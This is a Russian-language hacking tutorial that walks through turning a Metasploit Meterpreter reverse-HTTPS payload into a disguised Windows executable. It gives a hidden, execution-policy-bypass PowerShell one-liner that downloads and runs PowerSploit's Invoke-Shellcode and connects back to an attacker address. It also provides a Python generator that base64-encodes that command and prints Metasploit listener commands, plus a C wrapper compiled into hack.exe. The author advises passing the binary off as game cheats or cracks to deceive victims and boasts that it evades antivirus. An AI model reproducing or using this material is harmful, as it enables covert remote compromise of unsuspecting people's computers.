Как использовать Powershell для хакера OST (Хакерская тематика)

https://t.me/hackyouhack







Обучайтесь с нами! Мы в Telegram: https://t.me/joinchat/AAAAAEvqsQQCbVnDjA_vqA
1. Канал на YouTube: https://goo.gl/DY4gWT 
2. Группа Вконтакте: https://vk.com/hackyouhack

Приветствую вас колеги)

В прошлой статье мы научились использовать скрипты от PowerSploit для получение метерпретер сессии.
Но вынудить жертву открыть командную строку и вставить всю строку для PowerShell как вы поняли не очень легко,правда соц.инженерия делает чудеса,но все же попробуем упростить как можно больше этот процесс,процесс доставление до жертвы полезной нагрузки.

Этим мы сегодня и займемся.
Как по мне самый лучший способ доставлять жертве малварь в виде какого нибудь бинарника под предлогом какой то шары,толи это будет программа для взлома вк,толи читы на танки,толи кряк на антивирус - решать и фантазировать вам.

Давайте вспомним из прошлой статьи нашу команду для PowerShell-а:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force

Посмотрев на нее - мы можем заметить много спецсимволов,таких как кавычки,скобки,точка с запятой и т.д... Имхо такой вид не самый приемлемый как по мне.
По этому я накидал простенький скриптец который генерирует нам такую строку с base64 кодировкой и сразу же на вывод выведет нам команды для создание листенера в метасплоите.
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-

import re
import base64
from termcolor import colored

def banner():
    print colored("""
===============================================================================

#####                          #######           #     #                  
#     #  ####  #####  #####     #     # ######    #     #   ##    ####  #    #
#       #    # #    # #    #    #     # #         #     #  #  #  #    # #   #
#       #    # #    # #    #    #     # #####     ####### #    # #      ####
#       #    # #####  #####     #     # #         #     # ###### #      #  #
#     # #    # #   #  #         #     # #         #     # #    # #    # #   #
#####   ####  #    # #         ####### #         #     # #    #  ####  #    #
                                                                           
           ____                             __  __      _        
          |  _ \ _____      _____ _ __     |  \/  | ___| |_ ___ _ __
          | |_) / _ \ \ /\ / / _ \ '__|____| |\/| |/ _ \ __/ _ \ '__|
          |  __/ (_) \ V  V /  __/ | |_____| |  | |  __/ ||  __/ |
          |_|   \___/ \_/\_/ \___|_|       |_|  |_|\___|\__\___|_|
                                                                 

Powershell_Meter script  is a PowerShell Command Generator.
Written by [Mister Bert0ni|DarkNode] <Corp Of Hack Team><Grey Team> <CodeBy Team>
[[Contacts]] ::: <https://new.vk.com/byhackers>
[[My Docs]] ::: <https://codeby.net/forum/tags/darknode-tutorial/>
[[YouTube]]  ::: <https://www.youtube.com/c/CorpOfHack>
===============================================================================
""","cyan")
 
def powershell_encode(data):
    # blank command will store our fixed unicode variable
    blank_command = ""
    powershell_command = ""
    # Remove weird chars that could have been added by ISE
    n = re.compile(u'(\xef|\xbb|\xbf)')
    # loop through each character and insert null byte
    for char in (n.sub("", data)):
        # insert the nullbyte
        blank_command += char + "\x00"
    # assign powershell command as the new one
    powershell_command = blank_command
    # base64 encode the powershell command
    powershell_command = base64.b64encode(powershell_command)
    return powershell_command

def metasploit():
    print colored("[*]PowerShell генератор для Metasploit-Framework с ипользованиевм PowerSploit.","yellow")
    print colored("Оригинал можно взять здесь:","green")+ colored("https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1\n\n","cyan")
    ans_lhost = raw_input("Введите IP адрес атакующей машины(LHOST): ")
    ans_lport = raw_input("Введите Порт листенера атакуещей машины(LPORT): ")
 
    print colored("\n[*]Наша команда для PowerShell:","yellow")
    x = powershell_encode("IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost "+ans_lhost+" -Lport "+ans_lport+" -Force")
    print colored("powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc " + x,"red")
    print colored("\n[*]Команды для metasploit-framework(Вы можете сохранить эту последовательность команд в файл listener.rc и запустить msfconsole -r listener.rc или же прямо из запущеной консоли метаслоита: resourse listener.rc","yellow")
    print colored("use multi/handler \nset payload windows/meterpreter/reverse_https \nset LHOST " + ans_lhost + "\nset LPORT " + ans_lport + "\nset ExitOnSession false \nexploit -j","green")

banner()
metasploit()

Этот скрипт нас сгенерирует нужную строку.













Затем нам нужно впихнуть ее в бинарних. И хотелось бы конечно что бы он не детектился антивирусами) По дефолту он у меня показал 2/35.
Весьма не плохо как по мне) Ну а у кого параноя насчет фулл андетекта,то скажу что вероятность использования двух малоизвестных антивирусов, которые обнаружили малварь, не очень велика
Давайте соберем бинарник. Делается это очень просто:
Просто создадим соурс код на СИ (с) со следующим содержимым:
#include <stdlib.h>

int main() {
    system("Наша_Команда_PowerShell_Тута...");
        return 0;
}





Соответственно где "Наша_Команда_PowerShell_Тута..." - копипастим нашу строку которую вернул нам наш скрипт.





Компилируем в exe файл командой:
i686-w64-mingw32-gcc -o hack.exe ~/test.c





Тестируем:







WindowsDefender не ругается, сессия прилетает.

Смотрите также:

1. Как взломать страницу в Instagram 2018 -

https://www.youtube.com/watch?v=mSGXNDnYDC8

2. Как взломать страницу аккаунт и пароль вконтакте 2018 - 


Обучайтесь с нами! Мы в Telegram: https://t.me/joinchat/AAAAAEvqsQQCbVnDjA_vqA
1. Канал на YouTube: https://goo.gl/DY4gWT 
2. Группа Вконтакте: https://vk.com/hackyouhack